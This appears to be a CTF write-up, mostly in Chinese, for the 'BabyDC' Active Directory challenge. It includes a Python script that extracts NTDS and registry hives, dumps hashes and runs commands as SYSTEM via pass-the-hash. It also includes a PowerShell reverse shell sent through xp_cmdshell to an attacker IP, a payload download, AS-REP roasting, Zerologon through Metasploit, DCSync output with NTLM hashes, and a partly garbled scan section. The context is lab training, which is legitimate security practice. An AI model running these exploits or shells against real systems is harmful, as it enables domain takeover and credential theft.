DEFAULT_VBOX_HOME = ROOT / ".vboxhome"
DEFAULT_OFFLINE_DIR = ROOT / "offline" / "hives"
DEFAULT_DUMP = ROOT / "artifacts_secretsdump.txt"
DEFAULT_WHOAMI = ROOT / "artifacts_system_whoami.txt"
DEFAULT_HOSTNAME = ROOT / "artifacts_system_hostname.txt"


def run_command(args, *, cwd=None, env=None, check=True, capture=True):
    proc = subprocess.run(
        args,
        cwd=cwd,
        env=env,
        check=False,
        capture_output=capture,
        text=True,
        encoding="utf-8",
        errors="backslashreplace",
    )
    if check and proc.returncode != 0:
        details = proc.stdout
        if proc.stderr:
            details = f"{details}\n{proc.stderr}" if details else proc.stderr
        raise RuntimeError(f"command failed ({proc.returncode}): {' '.join(map(str, args))}\n{details}".rstrip())
    return proc


def ensure_exists(path: Path, hint: str) -> None:
    if not path.exists():
        raise RuntimeError(f"missing required file: {path}\n{hint}")


def find_vboxmanage() -> Path:
    candidates = [
        Path(r"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe"),
        Path(r"C:\Program Files\ldplayer9box\VBoxManage.exe"),
    ]
    for candidate in candidates:
        if candidate.exists():
            return candidate
    found = shutil.which("VBoxManage.exe") or shutil.which("VBoxManage")
    if found:
        return Path(found)
    raise RuntimeError("VBoxManage.exe not found. Install VirtualBox 7.2.0 or adjust PATH.")


def find_wsl() -> Path:
    found = shutil.which("wsl.exe")
    if not found:
        raise RuntimeError("wsl.exe not found. WSL with kali-linux is required for virt-copy-out.")
    return Path(found)


def find_secretsdump(default_python: Path) -> Path:
    candidates = [
        default_python.parent / "Scripts" / "secretsdump.py",
        Path(r"D:\Python\Python311\Scripts\secretsdump.py"),
    ]
    for candidate in candidates:
        if candidate.exists():
            return candidate
    raise RuntimeError("secretsdump.py not found. Install impacket for the Python interpreter you will use.")


def vbox(vboxmanage: Path, vbox_home: Path, *args: str) -> subprocess.CompletedProcess:
    env = os.environ.copy()
    env["VBOX_USER_HOME"] = str(vbox_home)
    return run_command([str(vboxmanage), *args], env=env)


def convert_to_wsl_path(path: Path) -> str:
    full = path.resolve()
    drive = full.drive[:1].lower()
    rest = full.as_posix()[2:]
    return f"/mnt/{drive}{rest}"


def ensure_ova_extracted(ova: Path, ovf: Path, vmdk: Path) -> None:
    ensure_exists(ova, "Place the challenge OVA in the current directory.")
    if ovf.exists() and vmdk.exists():
        return
    run_command(["tar", "-xf", str(ova), ovf.name, vmdk.name], cwd=ova.parent)


def ensure_vdi(vboxmanage: Path, vmdk: Path, vdi: Path) -> None:
    if vdi.exists():
        return
    vdi.parent.mkdir(parents=True, exist_ok=True)
    run_command([str(vboxmanage), "clonemedium", "disk", str(vmdk), str(vdi), "--format", "VDI"])


def ensure_vm_registered(vboxmanage: Path, vbox_home: Path, vm_dir: Path, vdi: Path) -> None:
    vm_dir.mkdir(parents=True, exist_ok=True)
    vbox_home.mkdir(parents=True, exist_ok=True)
    vbox(vboxmanage, vbox_home, "list", "systemproperties")
    vm_list = vbox(vboxmanage, vbox_home, "list", "vms").stdout
    vmx = vm_dir / f"{VM_NAME}.vbox"
    if f'"{VM_NAME}"' not in vm_list:
        if vmx.exists():
            vbox(vboxmanage, vbox_home, "registervm", str(vmx))
        else:
            vbox(vboxmanage, vbox_home, "createvm", "--name", VM_NAME, "--basefolder", str(ROOT / "vm"), "--ostype", "Windows2019_64", "--register")
            vbox(
                vboxmanage,
                vbox_home,
                "modifyvm",
                VM_NAME,
                "--memory",
                "2048",
                "--cpus",
                "1",
                "--firmware",
                "bios",
                "--ioapic",
                "on",
                "--pae",
                "off",
                "--vram",
                "128",
                "--graphicscontroller",
                "vboxsvga",
                "--boot1",
                "disk",
                "--boot2",
                "dvd",
                "--boot3",
                "none",
                "--boot4",
                "none",
                "--audio",
                "none",
            )
            vbox(vboxmanage, vbox_home, "storagectl", VM_NAME, "--name", "SATA", "--add", "sata", "--controller", "IntelAhci")

    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    if '"SATA-0-0"="none"' in info:
        vbox(
            vboxmanage,
            vbox_home,
            "storageattach",
            VM_NAME,
            "--storagectl",
            "SATA",
            "--port",
            "0",
            "--device",
            "0",
            "--type",
            "hdd",
            "--medium",
            str(vdi),
        )


def ensure_nat_rules(vboxmanage: Path, vbox_home: Path) -> None:
    forwards = [
        "http,tcp,127.0.0.1,18080,,80",
        "ldap,tcp,127.0.0.1,10389,,389",
        "mssql,tcp,127.0.0.1,11433,,1433",
        "smb,tcp,127.0.0.1,10445,,445",
    ]
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    for rule in forwards:
        name = rule.split(",", 1)[0]
        pattern = re.compile(rf'^Forwarding\(\d+\)="{re.escape(name)},', re.MULTILINE)
        if not pattern.search(info):
            vbox(vboxmanage, vbox_home, "modifyvm", VM_NAME, "--natpf1", rule)


def get_vm_state(vboxmanage: Path, vbox_home: Path) -> str:
    info = vbox(vboxmanage, vbox_home, "showvminfo", VM_NAME, "--machinereadable").stdout
    match = re.search(r'^VMState="([^"]+)"$', info, re.MULTILINE)
    return match.group(1) if match else "unknown"


def restart_vm(vboxmanage: Path, vbox_home: Path, boot_wait: int) -> None:
    state = get_vm_state(vboxmanage, vbox_home)
    if state == "running":
        vbox(vboxmanage, vbox_home, "controlvm", VM_NAME, "poweroff")
        time.sleep(3)
    vbox(vboxmanage, vbox_home, "startvm", VM_NAME, "--type", "headless")
    time.sleep(boot_wait)


def copy_offline_hives(wsl_exe: Path, work_root: Path, offline_dir: Path, distro: str, vmdk: Path) -> None:
    offline_dir.mkdir(parents=True, exist_ok=True)
    wsl_root = convert_to_wsl_path(work_root)
    wsl_vmdk = convert_to_wsl_path(vmdk)
    script = "\n".join(
        [
            "set -e",
            f"cd '{wsl_root}'",
            "mkdir -p offline/hives",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/NTDS/ntds.dit offline/hives/",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SYSTEM offline/hives/",
            f"virt-copy-out -a '{wsl_vmdk}' /Windows/System32/config/SECURITY offline/hives/",
        ]
    )
    run_command([str(wsl_exe), "-u", "root", "-d", distro, "--", "bash", "-lc", script])


def run_secretsdump(python_exe: Path, secretsdump: Path, offline_dir: Path, dump_path: Path) -> None:
    system_hive = offline_dir / "SYSTEM"
    security_hive = offline_dir / "SECURITY"
    ntds = offline_dir / "ntds.dit"
    ensure_exists(system_hive, "Offline SYSTEM hive is required.")
    ensure_exists(security_hive, "Offline SECURITY hive is required.")
    ensure_exists(ntds, "Offline NTDS.dit is required.")
    proc = run_command(
        [
            str(python_exe),
            str(secretsdump),
            "-system",
            str(system_hive),
            "-security",
            str(security_hive),
            "-ntds",
            str(ntds),
            "LOCAL",
        ]
    )
    dump_path.write_text(proc.stdout, encoding="utf-8")


def read_text_auto(path: Path) -> str:
    raw = path.read_bytes()
    for encoding in ("utf-8", "utf-16", "utf-16-le", "utf-16-be", "gbk"):
        try:
            return raw.decode(encoding)
        except UnicodeDecodeError:
            continue
    return raw.decode("utf-8", errors="ignore")


def extract_hash_line(dump_path: Path, account: str) -> str:
    pattern = re.compile(rf"{re.escape(account)}:\d+:[0-9a-fA-F]{{32}}:[0-9a-fA-F]{{32}}:::")
    for line in read_text_auto(dump_path).splitlines():
        match = pattern.search(line)
        if match:
            return match.group(0)
    raise RuntimeError(f"could not find hash line for {account} in {dump_path}")


def parse_hash_line(hash_line: str) -> tuple[str, str]:
    parts = hash_line.strip().split(":")
    if len(parts) < 4:
        raise RuntimeError(f"invalid hash line: {hash_line}")
    return parts[2], parts[3]


def random_tag(prefix: str, length: int = 8) -> str:
    return prefix + "".join(random.choice(string.ascii_letters) for _ in range(length))


def escape_for_cmd_echo(command: str) -> str:
    replacements = {
        "^": "^^",
        "&": "^&",
        "<": "^<",
        ">": "^>",
        "|": "^|",
    }
    escaped = []
    for char in command:
        escaped.append(replacements.get(char, char))
    return "".join(escaped)


def smbexec_one_shot(
    *,
    target_name: str,
    target_ip: str,
    smb_port: int,
    domain: str,
    username: str,
    password: str,
    lmhash: str,
    nthash: str,
    command: str,
) -> str:
    stringbinding = rf"ncacn_np:{target_name}[\pipe\svcctl]"
    rpc_transport = transport.DCERPCTransportFactory(stringbinding)
    rpc_transport.setRemoteHost(target_ip)
    rpc_transport.set_dport(smb_port)
    rpc_transport.set_credentials(username, password, domain, lmhash, nthash, None)

    dce = rpc_transport.get_dce_rpc()
    dce.connect()
    dce.bind(scmr.MSRPC_UUID_SCMR)

    smb_conn = rpc_transport.get_smb_connection()
    smb_conn.setTimeout(100000)

    scm_handle = scmr.hROpenSCManagerW(dce)["lpScHandle"]
    service_name = random_tag("svc")
    output_name = random_tag("out") + ".txt"
    batch_name = random_tag("job") + ".bat"
    output_path = rf"C:\Windows\Temp\{output_name}"
    batch_path = rf"C:\Windows\Temp\{batch_name}"
    batch_body = f"{escape_for_cmd_echo(command)} ^> {output_path} 2^>^&1"
    binary_path = (
        rf"C:\Windows\System32\cmd.exe /Q /c "
        rf"echo {batch_body} > {batch_path} & "
        rf"C:\Windows\System32\cmd.exe /Q /c {batch_path} & "
        rf"del {batch_path}"
    )

    service_handle = None
    try:
        resp = scmr.hRCreateServiceW(
            dce,
            scm_handle,
            service_name,
            service_name,
            lpBinaryPathName=binary_path,
            dwStartType=scmr.SERVICE_DEMAND_START,
        )
        service_handle = resp["lpServiceHandle"]
        try:
            scmr.hRStartServiceW(dce, service_handle)
        except Exception:
            pass

        time.sleep(1)

        last_error = None
        for _ in range(30):
            try:
                chunks = []

                def callback(data: bytes) -> None:
                    chunks.append(data)

                smb_conn.getFile("ADMIN$", rf"Temp\{output_name}", callback)
                output = b"".join(chunks).decode("utf-8", errors="backslashreplace")
                if output.strip():
                    smb_conn.deleteFile("ADMIN$", rf"Temp\{output_name}")
                    return output
            except Exception as exc:
                last_error = exc
            time.sleep(1)
        raise RuntimeError(f"timed out waiting for remote output file {output_name}: {last_error}")
    finally:
        if service_handle is not None:
            try:
                scmr.hRDeleteService(dce, service_handle)
            except Exception:
                pass
            try:
                scmr.hRCloseServiceHandle(dce, service_handle)
            except Exception:
                pass
        try:
            scmr.hRCloseServiceHandle(dce, scm_handle)
        except Exception:
            pass
        try:
            dce.disconnect()
        except Exception:
            pass


def extract_proof(output: str, command: str) -> str:
    cleaned = re.sub(r"[\x00-\x08\x0b-\x1f]", "", output)
    if command == "whoami":
        match = re.search(r"(?im)^\s*(nt authority\\system)\s*$", cleaned)
    elif command == "hostname":
        match = re.search(r"(?im)^\s*(CASTLEVANIA)\s*$", cleaned)
    else:
        match = None
    if not match:
        raise RuntimeError(f"failed to extract proof line for {command}")
    return match.group(1)


def verify_shell(
    *,
    dump_path: Path,
    hash_line: str | None,
    domain: str,
    username: str,
    target_name: str,
    target_ip: str,
    smb_port: int,
    whoami_path: Path,
    hostname_path: Path,
    retries: int,
    retry_delay: int,
) -> tuple[str, str]:
    if not hash_line:
        ensure_exists(dump_path, "Run the full mode first or provide --hash-line.")
        hash_line = extract_hash_line(dump_path, username)

    lmhash, nthash = parse_hash_line(hash_line)
    identity = f"{domain}/{username}@{target_name}"
    print(f"[*] principal : {identity}")
    print(f"[*] target ip : {target_ip}:{smb_port}")
    print(f"[*] hashes    : {lmhash}:{nthash}")

    def run_with_retry(command: str) -> str:
        last_error = None
        for attempt in range(1, retries + 1):
            try:
                return smbexec_one_shot(
                    target_name=target_name,
                    target_ip=target_ip,
                    smb_port=smb_port,
                    domain=domain,
                    username=username,
                    password="",
                    lmhash=lmhash,
                    nthash=nthash,
                    command=command,
                )
            except Exception as exc:
                last_error = exc
                if attempt == retries:
                    break
                print(f"[*] retry {attempt}/{retries - 1} for {command}: {exc}")
                time.sleep(retry_delay)
        raise RuntimeError(f"{command} failed after {retries} attempts: {last_error}")

    whoami_output = run_with_retry("whoami")
    whoami_path.write_text(whoami_output, encoding="utf-8")
    whoami = extract_proof(whoami_output, "whoami")
    print(f"[+] whoami    : {whoami}")

    hostname_output = run_with_retry("hostname")
    hostname_path.write_text(hostname_output, encoding="utf-8")
    hostname = extract_proof(hostname_output, "hostname")
    print(f"[+] hostname  : {hostname}")

    return whoami, hostname


def do_full(args) -> int:
    python_exe = args.python.resolve()
    vboxmanage = args.vboxmanage.resolve() if args.vboxmanage else find_vboxmanage()
    wsl_exe = args.wsl.resolve() if args.wsl else find_wsl()
    secretsdump = args.secretsdump.resolve() if args.secretsdump else find_secretsdump(python_exe)

    ensure_exists(python_exe, "Use a Python interpreter with impacket installed.")

    args.vbox_home.mkdir(parents=True, exist_ok=True)
    args.offline_dir.mkdir(parents=True, exist_ok=True)
    (ROOT / "vm").mkdir(parents=True, exist_ok=True)

    print("[*] extracting OVA if needed")
    ensure_ova_extracted(args.ova, args.ovf, args.vmdk)

    print("[*] preparing VDI")
    ensure_vdi(vboxmanage, args.vmdk, args.vdi)

    print("[*] registering VM")
    ensure_vm_registered(vboxmanage, args.vbox_home, args.vm_dir, args.vdi)

    print("[*] setting NAT forwards")
    ensure_nat_rules(vboxmanage, args.vbox_home)

    print("[*] starting VM")
    restart_vm(vboxmanage, args.vbox_home, args.boot_wait)

    print("[*] copying offline hives from VMDK")
    copy_offline_hives(wsl_exe, ROOT, args.offline_dir, args.wsl_distro, args.vmdk)

    print("[*] running secretsdump")
    run_secretsdump(python_exe, secretsdump, args.offline_dir, args.dump)

    print("[*] verifying Administrator shell")
    whoami, hostname = verify_shell(
        dump_path=args.dump,
        hash_line=args.hash_line,
        domain=args.domain,
        username=args.user,
        target_name=args.target,
        target_ip=args.target_ip,
        smb_port=args.smb_port,
        whoami_path=args.whoami_out,
        hostname_path=args.hostname_out,
        retries=args.verify_retries,
        retry_delay=args.verify_delay,
    )
    print(f"[+] complete   : {whoami} @ {hostname}")
    return 0


def do_verify(args) -> int:
    print("[*] verifying Administrator shell")
    whoami, hostname = verify_shell(
        dump_path=args.dump,
        hash_line=args.hash_line,
        domain=args.domain,
        username=args.user,
        target_name=args.target,
        target_ip=args.target_ip,
        smb_port=args.smb_port,
        whoami_path=args.whoami_out,
        hostname_path=args.hostname_out,
        retries=args.verify_retries,
        retry_delay=args.verify_delay,
    )
    print(f"[+] complete   : {whoami} @ {hostname}")
    return 0


def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(description="One-file local reproduction script for BabyDC.")
    parser.add_argument("--python", type=Path, default=Path(sys.executable), help="Python interpreter with impacket installed")
    parser.add_argument("--domain", default="XMCVE.local")
    parser.add_argument("--user", default="Administrator")
    parser.add_argument("--target", default="CASTLEVANIA.XMCVE.local")
    parser.add_argument("--target-ip", default="127.0.0.1")
    parser.add_argument("--smb-port", type=int, default=10445)
    parser.add_argument("--dump", type=Path, default=DEFAULT_DUMP)
    parser.add_argument("--hash-line", help="Explicit secretsdump line, overrides --dump in verify mode")
    parser.add_argument("--whoami-out", type=Path, default=DEFAULT_WHOAMI)
    parser.add_argument("--hostname-out", type=Path, default=DEFAULT_HOSTNAME)
    parser.add_argument("--verify-retries", type=int, default=12, help="Retry count for post-boot shell validation")
    parser.add_argument("--verify-delay", type=int, default=5, help="Seconds between shell validation retries")

    subparsers = parser.add_subparsers(dest="mode", required=True)

    full = subparsers.add_parser("full", help="Extract the disk, boot the VM, dump hashes, and verify SYSTEM execution")
    full.add_argument("--ova", type=Path, default=DEFAULT_OVA)
    full.add_argument("--ovf", type=Path, default=DEFAULT_OVF)
    full.add_argument("--vmdk", type=Path, default=DEFAULT_VMDK)
    full.add_argument("--vm-dir", type=Path, default=DEFAULT_VM_DIR)
    full.add_argument("--vdi", type=Path, default=DEFAULT_VDI)
    full.add_argument("--vbox-home", type=Path, default=DEFAULT_VBOX_HOME)
    full.add_argument("--offline-dir", type=Path, default=DEFAULT_OFFLINE_DIR)
    full.add_argument("--vboxmanage", type=Path, help="Override VBoxManage.exe")
    full.add_argument("--wsl", type=Path, help="Override wsl.exe")
    full.add_argument("--wsl-distro", default="kali-linux")
    full.add_argument("--secretsdump", type=Path, help="Override secretsdump.py")
    full.add_argument("--boot-wait", type=int, default=25, help="Seconds to wait after starting the VM")
    full.set_defaults(func=do_full)

    verify = subparsers.add_parser("verify", help="Use the dump or a hash line to prove SYSTEM execution")
    verify.set_defaults(func=do_verify)

    return parser


def main() -> int:
    parser = build_parser()
    args = parser.parse_args()
    return args.func(args)


if __name__ == "__main__":
    try:
        raise SystemExit(main())
    except Exception as exc:
        print(f"[-] {exc}", file=sys.stderr)
        raise

最终答案

最终权限证明如下：

whoami    -> nt authority\system
hostname  -> CASTLEVANIA

对应证据文件为：

artifacts_secretsdump.txt
artifacts_system_whoami.txt
artifacts_system_hostname.txt
proof_system.png

如果只需要快速验证管理员 shell，不需要重新走完整链路，直接执行：

D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe verify

如果需要从当前附件目录重新完整复现，直接执行：

D:\Python\Python311\python.exe .\babydc_unified.py --python D:\Python\Python311\python.exe full

平台漏洞（？？？）

漏洞描述

漏洞发现

接口写在前端中

const He = "/information";
var Oe = (s => (s.getNoticeInfo = He + "/getNoticeInfo",
s.GetRankInfoRequest = He + "/getRankInfo",
s.getTop10TeamRankForLine = He + "/getTop10TeamRankForLine",
s.adminGetInformationLog = He + "/adminGetInformationLog",
s.getOriginalSolveLog = He + "/getOriginalSolveLog",
s.getTeamBaseInfoForRank = He + "/getTeamBaseInfoForRank",
s.getUserBaseInfoForRank = He + "/getUserBaseInfoForRank",
s.getInformationLog = He + "/getInformationLog",
s.getMyTeamTendencyForLine = He + "/getMyTeamTendencyForLine",
s.getIdentityBaseOfRank = He + "/getIdentityBaseOfRank",
s.getRecentSubmitLog = He + "/getRecentSubmitLog",
s.getMatchTeamAndUserCount = He + "/getMatchTeamAndUserCount",
s.getChallengeSolveCountRank = He + "/getChallengeSolveCountRank",
s.getTeamRankWithChallengeInfo = He + "/getTeamRankWithChallengeInfo",
s.adminGetFlagCheatLog = He + "/adminGetFlagCheatLog",
s.adminExportScore = He + "/adminExportScore",
s.getWriteupTemplate = He + "/getWriteUpTemplate",
s))(Oe || {});
const Sa = s => E.post(Oe.getNoticeInfo, s)
  , Zn = s => E.post(Oe.GetRankInfoRequest, s)
  , vm = () => E.get(Oe.getTop10TeamRankForLine)
  , ym = s => E.post(Oe.adminGetInformationLog, s)
  , zi = s => E.post(Oe.getTeamBaseInfoForRank, s)
  , wm = s => E.post(Oe.getUserBaseInfoForRank, s)
  , Qn = s => E.post(Oe.getInformationLog, s)
  , bm = () => E.get(Oe.getMyTeamTendencyForLine)
  , Nm = () => E.get(Oe.getIdentityBaseOfRank)
  , Di = () => E.get(Oe.getRecentSubmitLog)
  , _m = () => E.get(Oe.getMatchTeamAndUserCount)
  , Cm = () => E.get(Oe.getChallengeSolveCountRank)
  , Sm = s => E.post(Oe.getTeamRankWithChallengeInfo, s)
  , Ei = s => E.post(Oe.getOriginalSolveLog, s)
  , km = s => E.post(Oe.adminGetFlagCheatLog, s)
  , Lm = s => E.post(Oe.adminExportScore, s)
  , Mm = () => E.get(Oe.getWriteupTemplate)
  , Tm = (s, t) => E.post("/user/adminGetUserList", {
    page_and_size: s,
    name: t
})
  , Ri = s => E.post("/user/adminGetUserInfo", {
    id: s
})
  , Im = s => E.post("/user/getUserLoginLog", {
    id: s
})
  , Pm = s => E.post("/user/getUserSubmitLog", {
    id: s
})
  , jr = s => E.post("/user/adminChangeBanStatus", s)
  , Fm = s => E.post("/user/adminSyncUserAndTeamInfo", s)
  , vr = () => E.get("/user/getUserInfo")

漏洞复现

scdyh（Zerologon）

端口扫描

| MIIDADCCAeigAwIBAgIQfKZK7ctznLZKnQZokrA1IzANBgkqhkiG9w0BAQUFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA | bABsAGIAYQBjAGswIBcNMjYwMzI4MDIwNjEzWhgPMjA1NjAzMjgwMjA2MTNaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMxRhfGS
| jzRvPpZEACdpj+rr3nY/v+rnj/6f9csEPa9jZp9KqHr/jricKUs1ZrH4aNsUUh7T | jmTbThIyELZ9VO38kxo3Mw1gsatZ1aD78UMiA1nqdFZc7KxFokRM8JquD8xlhiH7
| kELXCvrRQ0trXWAWFbXvUyuBR4aOAOVqq3Hy5DmPdc+MrL1QmGGhRWa2EgiaL9vE
| JOoIcnZUF1Bn7bzq70r7R9a26XRBjBVPTGv0jC9vwNoF1C3tTgXeGb45vSzBU2c8 | /h52fxGJQSpALZQLRlwUOKcMD/xAmYF/jsfyWx8jFN/n5w94JZb2NS+m8frTCC5B
| HrK5GJvXSsOxXwkCAwEAATANBgkqhkiG9w0BAQUFAAOCAQEAlTvxAMrdDvLqMbaV
| llLhQMT9WlVAjKHKgijbROdxhm//Ew39VaI5ihBkBRZeg/4i7ItI+yXBnUX/Hugx
| qrItAekUivjN3+aJheNQu5kKBRYKczs41zpHfryUDPPf/pu5oHRxoTZXy+n3gAf+ | dOc9HLH8edRS3MWLg9blorr9BlJgMlFqiYRmXKSPnkco5TneYZwqPq4x1w6CQLfd
| HPMNJiLfk9tix6/w47u+Oicr0CkrlQm1X6IeW3fPEUw5+GjP6TTQ8DnNSu6k+Qgc | jjXlBUG+YXFSoT3aimXn7eXjyXxcoVXtsxEnDKaWRSkqqcH0N5O5Dn0Npl8c2W0I
| rUXTmA==
|_-----END CERTIFICATE-----

3268/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP
(Domain: XMCVE.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 128
9389/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49738/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:5F:60:98 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CASTLEVANIA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: CASTLEVANIA, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:60:98
(PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   CASTLEVANIA<00>      Flags: <unique><active>
|   XMCVE<00>            Flags: <group><active>
|   XMCVE<1c>            Flags: <group><active>
|   CASTLEVANIA<20>      Flags: <unique><active>
|   XMCVE<1b>            Flags: <unique><active>
| Statistics:
|   08:00:27:5f:60:98:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-03-28T02:13:29
|_  start_date: N/A
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46026/tcp): CLEAN (Timeout)
|   Check 2 (port 53618/tcp): CLEAN (Timeout)
|   Check 3 (port 62163/udp): CLEAN (Timeout)
|   Check 4 (port 51584/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Kerberos 用户枚举

前面尝试了 smb、ldap、rpc 等协议的匿名枚举都失败了，看来还是得看看80端口 nuclei扫描的时候发现好像有短文件名解析的漏洞这个扫描结果让我联想到之前看到的一个靶机

发现 http://192.168.39.134/poo_connection.txt

获得初始凭证

虽然没有 xp_cmdshell 的权限，但是发现有连接

发现 POO_PUBLIC 是 sysadmin 权限，有 xp_cmdshell

反弹shell

exec ('xp_cmdshell ''powershell -nop -w hidden -ep bypass -c "$client = New-Object
System.Net.Sockets.TCPClient(''''192.168.39.142'''',4444);$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0)
{$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + ''''PS '''' + (Get-Location).Path + ''''> '''';$sendbyte =
([System.Text.Encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len gth);$stream.Flush()};$client.Close()"''') at POO_PUBLIC;

上线cs，这里讲道理来说有 Windows Defender，但是我也不确定我的免杀起作用了没有

iwr http://192.168.39.142:8000/ezad1.exe -OutFile C:\Windows\Tasks\ezad1.exe

SharpHound

没招了，丢个SharpHound上去跑一下

shell C:\Windows\Tasks\SharpHound.exe -c All --zipfilename loot.zip --OutputDirectory C:\Windows\Tasks

AS-REP Roasting

很容易能发现 MOWEN@XMCVE.LOCAL 可以 AS-REP Roast

GetNPUsers.py XMCVE.local/mowen -no-pass -dc-ip 192.168.39.134
hashcat -m 18200 mowen.asrep /usr/share/wordlists/rockyou.txt       #1maxwell

cs 派生一个 beacon，但是不知道为什么不能执行命令，猜下一步应该是 SeBackupPrivilege 提升权限，通过卷影副本提取 SAM/SYSTEM 文件的副本，问题就是没那到 mowen 用户的执行权限

zerologon

没想到原来能打 zerologon，这应该是一个非预期

置空域管hash后导出

pth 上线

但是我还是很纠结，mowen 到底怎么利用 SeBackupPrivilege 权限，没有 smbexec wmiexec winrmexec ，派生也没有拿到shell

''Always⌒（Zerologon）

题目信息

名称: BabyDC

类别: Web

分数: 1000

赛事: PolarisCTF 2026

环境配置

从提供的百度网盘链接下载了虚拟机镜像，并将其导入到 VirtualBox 7.2.0 中。虚拟机配置了NAT (Host-Only) 网络适配器，以便攻击机 (Kali Linux) 能够直接访问它。

信息收集

Nmap 网段+端口扫描

$ nmap -sV -sC 192.168.40.132

PORT     STATE SERVICE

53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
1433/tcp open  ms-sql-s
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

目标是一台 Windows Server 2019 域控制器 (Build 17763)。

通过 LDAP 获取域信息

对 rootDSE 进行匿名 LDAP 绑定，发现了以下信息：

域名: XMCVE.local

DC 主机名: CASTLEVANIA.XMCVE.local

林/域功能级别: 7 (Windows Server 2016)

SMB 枚举

匿名/访客 (Guest) SMB 登录被拒绝。空会话 (Null session) 同样被阻止。

Kerberos 用户枚举

使用 Kerberos AS-REQ 请求来枚举有效账户：

$ ldapsearch -x -H ldap://192.168.40.132 -s base

# dnsHostName: CASTLEVANIA.XMCVE.local
# defaultNamingContext: DC=XMCVE,DC=local

$ crackmapexec smb 192.168.40.132

SMB  192.168.40.132  445  CASTLEVANIA  [*] Windows 10 / Server 2019 Build 17763 x64
     (name:CASTLEVANIA) (domain:XMCVE.local) (signing:True) (SMBv1:False)

发现的有效账户包括： administrator , admin , castlevania , support。

所有账户都需要预身份验证（意味着无法进行 AS-REP Roasting 攻击）。

$ impacket-GetNPUsers XMCVE.local/ -dc-ip 192.168.40.132 -no-pass -usersfile users.txt

[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User castlevania doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User support doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED (guest, krbtgt - disabled)

漏洞发现

ZeroLogon (CVE-2020-1472)

使用 CrackMapExec 检查域控制器是否存在 ZeroLogon 漏洞：

该域控存在 CVE-2020-1472 (ZeroLogon) 漏洞。此漏洞利用了 Netlogon 协议中 AES-CFB8 实现的加密学缺陷，允许未经身份验证的攻击者将域控制器的计算机账户密码直接重置为空。

漏洞利用

第一步：ZeroLogon 漏洞利用

$ crackmapexec smb 192.168.40.132 -u '' -p '' -M zerologon

ZEROLOGO...  192.168.40.132  445  CASTLEVANIA  VULNERABLE

msf6> use auxiliary/admin/dcerpc/cve_2020_1472_zerologon
msf6> set RHOSTS 192.168.40.132
msf6> set NBNAME CASTLEVANIA
msf6> run

[+] 192.168.40.132:49668 - Successfully authenticated
[+] 192.168.40.132:49668 - Successfully set the machine account (CASTLEVANIA$) password to:
    aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)

第二步：DCSync - 导出所有域哈希

$ impacket-secretsdump -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0' \
   -just-dc 'XMCVE.local/CASTLEVANIA$'@192.168.40.132

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e3c4fe72e1383c576b4b3aeef4730a8:::
Alucard:1000:aad3b435b51404eeaad3b435b51404ee:d94f9831271e229dbc6e712097b63168:::
